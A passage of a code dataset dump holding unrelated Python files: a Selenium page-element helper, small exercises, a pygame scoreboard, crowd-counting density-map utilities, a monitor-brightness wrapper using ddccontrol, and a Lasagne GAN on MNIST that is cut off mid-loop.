range(len(data_list))])\n","sub_path":"gui_based_sorts/SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"333592425","text":"import time\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\nfrom common.webdriver_qa_api.core.utils import assert_should_be_equal, fail_test, assert_should_be_not_equal,\\\n assert_should_contain, assert_should_not_contain, assert_should_be_greater_than\nfrom common.webdriver_qa_api.core.selenium_dynamic_elements import DynamicElement, DynamicElements\nfrom common.scaf import get_logger, config\n\nlogger = get_logger(__name__)\n\n\nclass BaseElement:\n WAIT_SECONDS = config.web_settings.webdriver_default_wait_time\n\n def __init__(self, locator_type, locator, driver, name=None, parent=None):\n self.locator_type = locator_type\n self.locator = locator\n self.driver = driver\n self.parent = parent\n self.name = locator if name is None else name\n self.ALLOWED_DYNAMIC_METHODS = None\n self.element = DynamicElement(locator_type=locator_type,\n locator=locator,\n driver=driver, name=name,\n parent=parent)\n\n def __getattr__(self, item):\n if self.ALLOWED_DYNAMIC_METHODS is not None:\n assert item in self.ALLOWED_DYNAMIC_METHODS, f\"get attribute {item} directly is forbidden\"\n return getattr(self.element, item)\n\n def assert_present(self, is_present=True, with_waiting=True):\n \"\"\"\n assert element present, test fails if expected state isn't equal to actual\n :param is_present: if true - should be present, if false - should be absent\n :param with_waiting: if true - find element using is_present() method (with implicitly wait timeout),\n if false - find element using is_present_without_waiting() method (without timeout)\n \"\"\"\n actual_state = self.is_present() if with_waiting else self.is_present_without_waiting()\n assert_should_be_equal(actual_value=actual_state, expected_value=is_present,\n message=f\"Verify is element '{self.name}' present on the page\")\n\n def assert_enabled(self, is_enabled=True):\n \"\"\"\n assert element enabled, test fails if expected state isn't equal to actual\n :param is_enabled: if true - should be enabled, if false - should be disabled\n \"\"\"\n actual_state = self.element.is_enabled()\n assert_should_be_equal(actual_value=actual_state, expected_value=is_enabled,\n message=\"Verify is element '{}' \"\n \"enabled {}\".format(self.name, is_enabled))\n\n def assert_visible(self, is_visible=True):\n \"\"\"\n assert element visible, test fails if expected state isn't equal to actual\n :param is_visible: if true - should be visible, if false - should be hidden\n \"\"\"\n actual_state = self.element.is_displayed()\n assert_should_be_equal(actual_value=actual_state,\n expected_value=is_visible,\n message=\"Verify is element '{}' \"\n \"visible\".format(self.name))\n\n def assert_focused(self, is_focused=True):\n \"\"\"\n assert element focused, test fails if expected state isn't equal to actual\n :param is_focused: if true - should be focused, if false - not focused\n \"\"\"\n expected_state = \"true\" if is_focused else \"false\"\n actual_state = self.element.get_attribute(\"focused\")\n assert_should_be_equal(actual_value=actual_state, expected_value=expected_state,\n message=\"Verify is element '{}' focused\".format(self.name))\n\n def assert_element_text(self, expected):\n \"\"\"\n assert that element text is equal to expected\n \"\"\"\n element_text = self.element.text\n assert_should_be_equal(actual_value=element_text, expected_value=expected, silent=True)\n\n def assert_element_attribute(self, attribute, expected_value):\n \"\"\"\n assert that element attribute is equal to expected\n \"\"\"\n attribute_value = self.element.get_attribute(attribute)\n assert_should_be_equal(actual_value=attribute_value, expected_value=expected_value, silent=True)\n\n def assert_element_contains_text(self, expected):\n \"\"\"\n assert that element text contains expected value {expected}\n \"\"\"\n element_text = self.element.text\n assert_should_contain(actual_value=expected, expected_value=element_text, silent=True)\n\n def assert_element_should_not_contain_text(self, expected):\n \"\"\"\n assert that element text contains expected value {expected}\n \"\"\"\n element_text = self.element.text\n assert_should_not_contain(actual_value=expected,\n expected_value=element_text,\n silent=True)\n\n def assert_element_text_empty(self):\n \"\"\"\n assert that element text is empty (equals with empty string)\n \"\"\"\n self.assert_element_text(\"\")\n\n def assert_element_text_not_empty(self):\n \"\"\"\n assert that element text is not empty (equals with empty string)\n \"\"\"\n element_text = self.element.text\n assert_should_be_not_equal(actual_value=element_text, expected_value=\"\", silent=True)\n\n def is_present(self):\n \"\"\"\n :return: true if element is present, false if element is absent\n \"\"\"\n return self.element() is not None\n\n def is_present_without_waiting(self):\n \"\"\"\n :return: true if element is present, false if element is absent\n \"\"\"\n try:\n self.driver.implicitly_wait(0)\n WebDriverWait(self.driver, 0).until(EC.presence_of_element_located((self.locator_type, self.locator)))\n return True\n except:\n return False\n finally:\n self.driver.implicitly_wait(config.web_settings.webdriver_implicit_wait_time)\n\n def _wait_element(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element present\n\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will fail if element is absent.\n \"\"\"\n if not silent:\n logger.info(\"Wait for '{0}' in {1} seconds\".format(self.name, second))\n wait = WebDriverWait(self.driver, second)\n wait.until(EC.presence_of_element_located((self.locator_type, self.locator)))\n return self\n\n def wait_element(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element present with fail test if element not be found\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will fail if element is absent.\n \"\"\"\n try:\n self._wait_element(silent, second)\n except TimeoutException:\n fail_test(\"The element {} can not be located in {} seconds\".format(self.name, second))\n return self\n\n def try_wait_element(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait to see if element becomes present during timeout\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will fail if element is absent.\n :return: true if element becomes present during timeout\n \"\"\"\n try:\n self._wait_element(silent, second)\n except TimeoutException:\n return False\n return True\n\n def wait_element_absent(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element absent (if timeout more than 20 second, find element with default timeout,\n else find element every 0.1 seconds)\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will wail if element is absent.\n \"\"\"\n present_method = self.is_present if second > 30 else self.is_present_without_waiting\n\n if not silent:\n logger.info(\"Wait for '{0}' absent in {1} seconds\".format(self.name, second))\n end_time = time.time() + second\n present = True\n while time.time() < end_time and present:\n present = present_method()\n time.sleep(0.1)\n self.assert_present(is_present=False, with_waiting=False)\n\n def wait_element_enabled(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element enabled\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will wail if element is enabled.\n \"\"\"\n if not silent:\n logger.info(\"Wait for '{0}' is enabled\".format(self.name))\n assert_should_be_equal(actual_value=self.element.is_enabled, expected_value=True,\n message=\"Verify is element '{}' enabled\".format(self.name),\n timeout=second, silent=silent)\n\n def wait_element_disabled(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element disabled\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will wail if element is enabled.\n \"\"\"\n if not silent:\n logger.info(\"Wait for '{0}' is disabled\".format(self.name))\n assert_should_be_equal(actual_value=self.element.is_enabled, expected_value=False,\n message=\"Verify is element '{}' disabled\".format(self.name),\n timeout=second, silent=silent)\n\n def wait_element_visible(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element visible\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will wail if element is visible.\n \"\"\"\n if not silent:\n logger.info(\"Wait for '{0}' is visible\".format(self.name))\n assert_should_be_equal(actual_value=self.element.is_displayed, expected_value=True,\n message=\"Verify is element '{}' visible\".format(self.name),\n timeout=second, silent=silent)\n\n def wait_element_invisible(self, silent=False, second=WAIT_SECONDS):\n \"\"\"\n wait for element invisible\n :param silent: true - log message isn't displayed, false - log message is displayed\n :param second: number of seconds after which test will wail if element is visible.\n \"\"\"\n if not silent:\n logger.info(\"Wait for '{0}' is invisible\".format(self.name))\n assert_should_be_equal(actual_value=self.element.is_displayed, expected_value=False,\n message=\"Verify is element '{}' invisible\".format(self.name),\n timeout=second, silent=silent)\n\n def wait_element_contains_text(self, expected, second=WAIT_SECONDS):\n end_time = time.time() + second\n while time.time() < end_time and expected not in \\\n self.element.text:\n pass\n self.assert_element_text(expected)\n\n def wait_element_does_not_contain_text(self, expected, second=WAIT_SECONDS):\n end_time = time.time() + second\n while time.time() < end_time and expected in self.element.text:\n pass\n self.assert_element_should_not_contain_text(expected)\n\n def get_element_location(self, silent=True):\n \"\"\"\n find element and get it's location\n :param silent: true - log message isn't displayed, false - log message is displayed\n :return: location of element ('x' and 'y')\n \"\"\"\n if not silent:\n logger.info(\"Get location of element '{}'\".format(self.locator))\n return self.element.location\n\n def click_by_coord(self):\n action = ActionChains(self.driver)\n action.move_to_element_with_offset(self.element, 5, 5)\n action.click()\n action.perform()\n\n def wait_element_loaded(self, second=10):\n wait = WebDriverWait(self.driver, second)\n try:\n wait.until(EC.staleness_of(self.element()))\n except TimeoutException:\n pass\n finally:\n wait.until(EC.visibility_of(self.element()))\n\n\nclass BaseElements:\n def __init__(self, locator_type, locator, driver, name=None, parent=None):\n self.locator_type = locator_type\n self.locator = locator\n self.driver = driver\n self.elements = DynamicElements(locator_type=locator_type,\n locator=locator,\n driver=driver,\n name=name,\n parent=parent)\n\n def assert_elements_number_greater_than(self, expected):\n actual = len(self.elements())\n assert_should_be_greater_than(actual, expected)\n\n\nclass BaseElementsActionsMixin:\n\n def get_elements_text(self):\n \"\"\"\n find elements and get it's text\n :return: list of the text of element\n \"\"\"\n result = []\n for element in self():\n result.append(element.text)\n return result\n","sub_path":"common/webdriver_qa_api/core/base_elements.py","file_name":"base_elements.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"80755466","text":"# Exercise 33: Birthday Dictionaries\n#\n# Find birthday information based on their name.\n\n\n# Main function\ndef main():\n # Get the dictionary\n dict = create_dict()\n\n print(\"Welcome to the birthday dictionary. We know the birthdays of:\")\n\n for key in dict:\n print(key)\n\n famous_person = input(\"Whose birthday do you want to look up?\\n\")\n\n print(\"{}\\'s birthday is on {}\".format(famous_person, dict[famous_person]))\n\n\n# Create a dictionary with famous people's birthdays\ndef create_dict():\n # Create a dictionary with birthdays\n bday_dictionary = {\n \"Albert Einstein\": \"March 14, 1879\",\n \"Benjamin Franklin\": \"January 17, 1706\",\n \"Ada Lovelace\": \"December 10, 1815\"\n }\n\n return bday_dictionary\n\n\nif __name__ == '__main__':\n main()","sub_path":"exercise33.py","file_name":"exercise33.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"462464313","text":"# Script that prompts the user to enter hours and rate per hour to calculate pay of the person provided he worked everyday, every week every month\n\nhours = int(input('Enter hours worked in a day: '))\nrate_per_hour = int(input('Enter your rate per hour: '))\ndaily_earning = hours * rate_per_hour\nweekly_earning = daily_earning * 5\nmonthly_earning = weekly_earning * 4\nyearly_earning = monthly_earning * 12\nprint(f'My daily earning if I worked {hours} hours with {rate_per_hour} $ is: $',daily_earning)\nprint('My weekly earning is: $',weekly_earning)\nprint('My monthly earning is: $',monthly_earning)\nprint('My yearly earning is: $',yearly_earning)\n","sub_path":"wagesearn.py","file_name":"wagesearn.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"417332677","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nclass Solution:\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x>2**31-1 or x<(-2)**31:\n return 0\n n_type = 0\n if x > 0:\n x = str(x)\n else:\n x = str(x * -1)\n n_type = -1\n\n result = x[::-1]\n if n_type == 0:\n print(int(result))\n return int(result)\n else:\n print(int(result) * -1)\n return int(result) * -1\n\n\nif __name__ == '__main__':\n s = Solution()\n s.reverse(1534236469)","sub_path":"leetcode/fanzhuanshu.py","file_name":"fanzhuanshu.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"383868058","text":"# PYTHON script\n\n'''\nPAMCRASH check materials for Nissan\n===================================\n\nCheck materials based matching list and name in properties name:\n\nUsage\n-----\n\n**Primary solver** - ABAQUS/PAMCRASH/NASTRAN.\n\n**User defined parameters**:\n\n- delimiter for part name of segment e.g. __\n- number of segments of names of properties e.g. 5\n- type of loadcase e.g. COMMON\n in case of empty parametr, the list of loadcases is popup\n in case of only one loadcase in matching list is appied just this\n- segment of material name e.g. 5\n- matching list - /data/fem/+software/SKODA_INCLUDE/white_list\n\n**Fix function** is available for some warnings.\n\n'''\n\nimport os, ansa\nfrom ansa import base, constants\n\n# ==============================================================================\n\nDEBUG = 0\n\nif DEBUG:\n\tPATH_SELF = '/data/fem/+software/SKRIPTY/tools/python/ansaTools/checks/general_check/default'\n#\tPATH_SELF = os.path.dirname(os.path.realpath(__file__))\nelse:\n\tPATH_SELF = os.path.join(os.environ['ANSA_TOOLS'], 'checks','general_check','default')\nansa.ImportCode(os.path.join(PATH_SELF, 'check_base_items.py'))\n\nansa.ImportCode(os.path.join(PATH_SELF, 'check_PAM_materials_ex_fix.py'))\nexe = check_PAM_materials_ex_fix.exe\nfix = check_PAM_materials_ex_fix.fix\n\n# ==============================================================================\n\nclass CheckItem(check_base_items.BaseEntityCheckItem):\n\tSOLVER_TYPE = constants.PAMCRASH\n\tENTITY_TYPES = ['SHELL', 'MEMBRANE', 'SOLID']\n\n# ==============================================================================\n\t\n# Update this dictionary to load check automatically\ncheckOptions = {'name': 'Check materials with a checking list (ABA/PAM/NAS) - NISSAN',\n\t'exec_action': ('exe', os.path.realpath(__file__)),\n\t'fix_action': ('fix', os.path.realpath(__file__)),\n\t'deck': CheckItem.SOLVER_TYPE,\n\t'requested_types': CheckItem.ENTITY_TYPES,\n\t'info': 'Checks materials'}\ncheckDescription = base.CheckDescription(**checkOptions)\n\n# Add parameters\ncheckDescription.add_str_param('Number of segments', '4')\ncheckDescription.add_str_param('Segment of material name', '2')\ncheckDescription.add_str_param('Type of loadcase', 'PV1200')\ncheckDescription.add_str_param('Solver', 'PAMCRASH')\ncheckDescription.add_str_param('Matching list', '/data/ostatni/NISSAN/BATTERY_CASE/SCRIPTS/white_list')\ncheckDescription.add_str_param('Delimiter for part name', '__')\n\n# ==============================================================================\n\nif __name__ == '__main__' and DEBUG:\n\t\n\ttestParams = {\n\t\t'Number of segments': '4',\n\t\t'Segment of material name': '2',\n\t\t'Type of loadcase': 'PV1200',\n\t\t'Solver': 'PAMCRASH',\n\t\t'Matching list': '/data/ostatni/NISSAN/BATTERY_CASE/SCRIPTS/white_list',\n\t\t'Delimiter for part name': '__'}\n\tcheck_base_items.debugModeTestFunction(CheckItem, testParams)\n\n# ==============================================================================\n\n","sub_path":"res/checks/check_PAM_materials_ex_fix_nissan.py","file_name":"check_PAM_materials_ex_fix_nissan.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"513401106","text":"import sys\nfrom enum import Enum\n\nimport pygame\n\n\nclass Scoreboard:\n\n def __init__(self):\n self.score_value = 0\n self.font = pygame.font.Font('freesansbold.ttf', 32)\n self.textX = 10\n self.textY = 10\n self.over_font = pygame.font.Font('freesansbold.ttf', 100)\n self.won_font = pygame.font.Font('freesansbold.ttf', 100)\n self.replay_font = pygame.font.Font('freesansbold.ttf', 20)\n\n def show_score(self, screen):\n score_text = self.font.render(\"Score: \" + str(self.score_value), True, (255, 255, 255))\n screen.blit(score_text, (self.textX, self.textY))\n\n def check_game_end(self, screen, enemy):\n if self.score_value >= 10:\n self.game_won_text(screen)\n return True\n if enemy > int(screen.get_height() - 200):\n self.game_over_text(screen)\n return True\n\n def game_won_text(self, screen):\n won_text = self.won_font.render(\"YOU WIN\", True, (255, 255, 255))\n replay_text = self.replay_font.render(\"Press 'R' To Play Again\", True, (255, 255, 255))\n rect1 = won_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2)))\n rect2 = replay_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2) + 70))\n screen.blit(won_text, rect1)\n screen.blit(replay_text, rect2)\n\n def game_over_text(self, screen):\n over_text = self.over_font.render(\"GAME OVER\", True, (255, 255, 255))\n replay_text = self.replay_font.render(\"Press 'R' To Play Again\", True, (255, 255, 255))\n rect1 = over_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2)))\n rect2 = replay_text.get_rect(center=(int(screen.get_width() / 2), int(screen.get_height() / 2) + 70))\n screen.blit(over_text, rect1)\n screen.blit(replay_text, rect2)\n\n\nclass ControllerState(Enum):\n NONE = 0\n LEFT = 1\n RIGHT = 2\n SPACE = 3\n RESTART_KEY = 4\n KEY_RELEASE = 5\n\n\nclass playerInput:\n def __init__(self):\n self.game_running = True\n self.controller_state = ControllerState.NONE\n\n def movement(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_running = False\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.controller_state = ControllerState.LEFT\n if event.key == pygame.K_RIGHT:\n self.controller_state = ControllerState.RIGHT\n if event.key == pygame.K_SPACE:\n self.controller_state = ControllerState.SPACE\n if event.key == pygame.K_r:\n self.controller_state = ControllerState.RESTART_KEY\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n self.controller_state = ControllerState.KEY_RELEASE\n","sub_path":"assets/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"262508997","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport scipy.io as scio\nimport scipy\nfrom scipy.ndimage.filters import gaussian_filter\n\n\ndef gaussian_kernel_2d(kernel_size=3, sigma=0.):\n kx = cv2.getGaussianKernel(kernel_size, sigma)\n ky = cv2.getGaussianKernel(kernel_size, sigma)\n return np.multiply(kx, np.transpose(ky))\n\n\ndef truncation_normal_distribution(standard_variance):\n return tf.truncated_normal_initializer(0.0, standard_variance)\n\n\ndef structural_similarity_index_metric(feature, labels):\n c1 = 0.01 ** 2\n c2 = 0.03 ** 2\n weight = gaussian_kernel_2d(11, 1.5)\n weight = tf.constant(weight)\n weight = tf.reshape(weight, [11, 11, 1, 1])\n weight = tf.cast(weight, tf.float32)\n mean_f = tf.nn.conv2d(feature, weight, [1, 1, 1, 1], padding=\"SAME\")\n mean_y = tf.nn.conv2d(labels, weight, [1, 1, 1, 1], padding=\"SAME\")\n mean_f_mean_y = tf.multiply(mean_f, mean_y)\n square_mean_f = tf.multiply(mean_f, mean_f)\n square_mean_y = tf.multiply(mean_y, mean_y)\n variance_f = tf.nn.conv2d(tf.multiply(feature, feature), weight, [1, 1, 1, 1], padding=\"SAME\") - square_mean_f\n variance_y = tf.nn.conv2d(tf.multiply(labels, labels), weight, [1, 1, 1, 1], padding=\"SAME\") - square_mean_y\n variance_fy = tf.nn.conv2d(tf.multiply(feature, labels), weight, [1, 1, 1, 1], padding=\"SAME\") - mean_f_mean_y\n ssim = ((2*mean_f_mean_y + c1)*(2*variance_fy + c2)) / \\\n ((square_mean_f + square_mean_y + c1)*(variance_f + variance_y + c2))\n return 1 - tf.reduce_mean(ssim, reduction_indices=[1, 2, 3])\n\n\ndef get_density_map_gaussian(N, M, points, adaptive_kernel=False, fixed_value=15):\n density_map = np.zeros([N, M], dtype=np.float32)\n h, w = density_map.shape[:2]\n num_gt = np.squeeze(points).shape[0]\n if num_gt == 0:\n return density_map\n\n if adaptive_kernel:\n # referred from https://github.com/vlad3996/computing-density-maps/blob/master/make_ShanghaiTech.ipynb\n leafsize = 2048\n tree = scipy.spatial.KDTree(points.copy(), leafsize=leafsize)\n distances = tree.query(points, k=4)[0]\n\n for idx, p in enumerate(points):\n p = np.round(p).astype(int)\n p[0], p[1] = min(h-1, p[1]), min(w-1, p[0])\n if num_gt > 1:\n if adaptive_kernel:\n sigma = int(np.sum(distances[idx][1:4]) // 3 * 0.3)\n else:\n sigma = fixed_value\n else:\n sigma = fixed_value # np.average([h, w]) / 2. / 2.\n sigma = max(1, sigma)\n\n # filter_mask = np.zeros_like(density_map)\n # gaussian_center = (p[0], p[1])\n # filter_mask[gaussian_center] = 1\n # density_map += gaussian_filter(filter_mask, sigma, mode='constant')\n\n # If you feel that the scipy api is too slow (gaussian_filter) -- Substitute it with codes below\n # could make it about 100+ times faster, taking around 2 minutes on the whole ShanghaiTech dataset A and B.\n\n gaussian_radius = sigma * 3\n gaussian_map = np.multiply(\n cv2.getGaussianKernel(gaussian_radius*2+1, sigma),\n cv2.getGaussianKernel(gaussian_radius*2+1, sigma).T\n )\n x_left, x_right, y_up, y_down = 0, gaussian_map.shape[1], 0, gaussian_map.shape[0]\n # cut the gaussian kernel\n if p[1] < 0 or p[0] < 0:\n continue\n if p[1] < gaussian_radius:\n x_left = gaussian_radius - p[1]\n if p[0] < gaussian_radius:\n y_up = gaussian_radius - p[0]\n if p[1] + gaussian_radius >= w:\n x_right = gaussian_map.shape[1] - (gaussian_radius + p[1] - w) - 1\n if p[0] + gaussian_radius >= h:\n y_down = gaussian_map.shape[0] - (gaussian_radius + p[0] - h) - 1\n density_map[\n max(0, p[0]-gaussian_radius):min(density_map.shape[0], p[0]+gaussian_radius+1),\n max(0, p[1]-gaussian_radius):min(density_map.shape[1], p[1]+gaussian_radius+1)\n ] += gaussian_map[y_up:y_down, x_left:x_right]\n return density_map","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"362963176","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Copyright © 2016 Martin Ueding <martin-ueding.de>\n# Licensed under The MIT License\n\nimport subprocess\n\n\ndef set_brightness(brightness, device):\n assert 0 <= brightness <= 100, 'Brightness must be between 0 and 100.'\n\n command = ['ddccontrol',\n '-r', '0x10',\n '-w', str(brightness),\n 'dev:/dev/i2c-{}'.format(device)]\n status = subprocess.call(command)\n\n if status != 0:\n print('ddccontrol failed but it might still have worked')\n\n\ndef set_maximum_color(red, green, blue, device):\n assert 0 <= red <= 100, 'Red must be between 0 and 100.'\n assert 0 <= green <= 100, 'Green must be between 0 and 100.'\n assert 0 <= blue <= 100, 'Blue must be between 0 and 100.'\n\n addresses = ['0x16', '0x18', '0x1a']\n\n for address, value in zip(addresses, [red, green, blue]):\n command = ['ddccontrol',\n '-r', address,\n '-w', str(value),\n 'dev:/dev/i2c-{}'.format(device)]\n status = subprocess.call(command)\n\n if status != 0:\n print('ddccontrol failed but it might still have worked')\n","sub_path":"externalbrightness/ddccontrol.py","file_name":"ddccontrol.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"489772924","text":"\n# coding: utf-8\n\n# In[8]:\n\n# Run some setup code for this notebook.\n\nimport random\nimport numpy as np\nfrom cs231n.data_utils import load_CIFAR10\nimport matplotlib.pyplot as plt\n\nimport sys\nimport os\nimport time\nfrom __future__ import print_function\n#from adversarial import\nimport time\nimport theano\nimport gzip\nimport lasagne\nimport lasagne.layers as L\nimport theano.tensor as T\n\nfrom lasagne import nonlinearities\nfrom lasagne.updates import sgd, momentum\nfrom lasagne.init import Normal\n\nimport seaborn as sns\nfrom scipy.stats import norm\n\n\nget_ipython().magic(u'matplotlib inline')\nplt.rcParams['figure.figsize'] = (3,3) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\nget_ipython().magic(u'load_ext autoreload')\nget_ipython().magic(u'autoreload 2')\n\ndef load_mnist_images(filename):\n if not os.path.exists(filename):\n download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n data = data.reshape(-1, 1, 28, 28)\n return data\n\ndef load_mnist_labels(filename):\n if not os.path.exists(filename):\n download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n return data\n\n # We can now download and read the training and test set images and labels.\nX_train = load_mnist_images('train-images-idx3-ubyte.gz')\ny_train = load_mnist_labels('train-labels-idx1-ubyte.gz')\nX_test = load_mnist_images('t10k-images-idx3-ubyte.gz')\ny_test = load_mnist_labels('t10k-labels-idx1-ubyte.gz')\n#if you want to use CIFAR10 to test,please use the following:\n#X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)\n#X_train = np.reshape(X_train, (X_train.shape[0], -1))\n#X_test = np.reshape(X_test, (X_test.shape[0], -1))\n#X_train=X_train/np.float32(256)\n#X_test=X_test/np.float32(256)\n\nX_train = np.reshape(X_train, (X_train.shape[0], -1))\nX_test = np.reshape(X_test, (X_test.shape[0], -1))\nX_train=X_train[:10000]\ny_train=y_train[:10000]\n#test for ONE class\n#y=5\n#idxs = np.flatnonzero(y_train == y)\n#X_train=X_train[idxs]\n#y_train=y_train[idxs]\n\n#make all are true iamge\n#y_train=y_train-y_train+1\n#y_test=y_test-y_test+1\n#X_train[:]=(X_train[:]-np.mean(X_train[:]))/np.std(X_train[:])\nX_train=X_train/np.float32(256)\nprint(X_train.shape)\nprint(y_train.shape)\nplt.subplot(1,1,1)\nplt.imshow(X_train[0].reshape(28,28))\nplt.axis('off')\nplt.show()\n\n\n# In[9]:\n\ndef mlp_g(h_size,nl=nonlinearities.tanh,mid=nonlinearities.tanh):\n# assert len(h_size) > 1, \"Must have at least two layers!\"\n# nld['tanh']=nonlinearities.tanh\n# nld['sigmoid']=nonlinearities.sigmoid\n# nl=nld[cho]\n layer = L.InputLayer(shape=(None, h_size[0]))\n for size in h_size[1:-1]:\n # layer = L.DenseLayer(L.dropout(layer, 0.5), s)\n layer = L.DenseLayer(layer, size, W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=mid)\n#my:change\n return L.DenseLayer(layer, h_size[-1], W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=nl)\ndef mlp_d(h_size,nl=nonlinearities.tanh,mid=nonlinearities.tanh):\n# assert len(h_size) > 1, \"Must have at least two layers!\"\n# nld['tanh']=nonlinearities.tanh\n# nld['sigmoid']=nonlinearities.sigmoid\n# nl=nld[cho]\n layer = L.InputLayer(shape=(None, h_size[0]))\n for size in h_size[1:-1]:\n layer = L.DenseLayer(layer, size, W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=mid)\n layer = L.DropoutLayer(layer,p=0.5,rescale=True)\n#my:change\n return L.DenseLayer(layer, h_size[-1], W=lasagne.init.Uniform(range=0.1, std=None, mean=0.0), nonlinearity=nl)\n\n\n# In[10]:\n\n#choose different batch to train every epoch\ndef iterate_minibatches(inputs, targets, batchsize, shuffle=False):\n assert len(inputs) == len(targets)\n if shuffle:\n indices = np.arange(len(inputs))\n np.random.shuffle(indices)\n for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):\n if shuffle:\n excerpt = indices[start_idx:start_idx + batchsize]\n else:\n excerpt = slice(start_idx, start_idx + batchsize)\n yield inputs[excerpt], targets[excerpt]\n\n\n# In[11]:\n\ndef make_z(n,g_size=100):\n return np.asarray(np.random.randn(n,g_size),dtype=np.float32)\n\n\n# In[12]:\n\nlr = 0.001\ng_size=100\nmom=0.9\n\n\n# In[13]:\n\ng_size=[g_size,500,784]\nd_size=[784,240,240,2]\n\ng_nnet = mlp_g(g_size,nl=nonlinearities.sigmoid,mid=nonlinearities.rectify)\nd_nnet = mlp_d(d_size,nl=nonlinearities.softmax,mid=nonlinearities.rectify)\n\ninput_var = T.dmatrix('inputs')\ntarget_var = T.lvector('targets')\ninput_g = T.dmatrix('inputs')\n\ng = L.get_output(g_nnet, input_g)\ndx = L.get_output(d_nnet, input_var)\ndg = L.get_output(d_nnet, g)\n\nget_dx = theano.function(inputs=[input_var], outputs=dx)\nget_g = theano.function(inputs=[input_g], outputs=g)\nget_dg= theano.function(inputs=[input_g], outputs=dg)\n#Classifier\n#loss = lasagne.objectives.categorical_crossentropy(dx,target_var)\n#d_loss = loss.mean()\n#GAN\nd_loss = -T.mean(T.log(dx[:,1]) + T.log(dg[:,0]))\ng_loss = -T.mean(T.log(dg[:,1]))\n\nd_updates = lasagne.updates.nesterov_momentum(d_loss, L.get_all_params(d_nnet,trainable=True), learning_rate=lr, momentum=mom)\ng_updates = lasagne.updates.nesterov_momentum(g_loss, L.get_all_params(g_nnet,trainable=True), learning_rate=lr, momentum=mom)\n\ntrain_d = theano.function(inputs=[input_var, input_g], outputs=d_loss, updates=d_updates)\ntrain_g = theano.function(inputs=[input_g], outputs=g_loss, updates=g_updates)\n\n#Classifier Test\n#test_prediction = L.get_output(d_nnet,input_var)\n#test_loss = lasagne.objectives.categorical_crossentropy(test_prediction,target_var)\n#test_loss = test_loss.mean()\n#test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1), target_var),dtype=theano.config.floatX)\n\n#val_d = theano.function(inputs=[input_var, target_var], outputs=[test_loss, test_acc])\nval_accx=T.mean(dx[:,1])\nval_accg=T.mean(dg[:,0])\nval_d = theano.function(inputs=[input_var, input_g], outputs=[val_accx,val_accg])\n\n\n# In[14]:\n\ntrain_iters =200\npp1=0.55\npp2=0.8\nbatch_size=100\nk = 100\np = 1000\nrow=10\ncol=10\n \nhistd, histg = np.zeros(train_iters), np.zeros(train_iters)\n\nfor epoch in range(train_iters):\n start_time = time.time()\n #k update D\n td_err=0\n td_batches=0\n for j in range(k):\n for batch in iterate_minibatches(X_train, y_train, batch_size,shuffle=True):\n 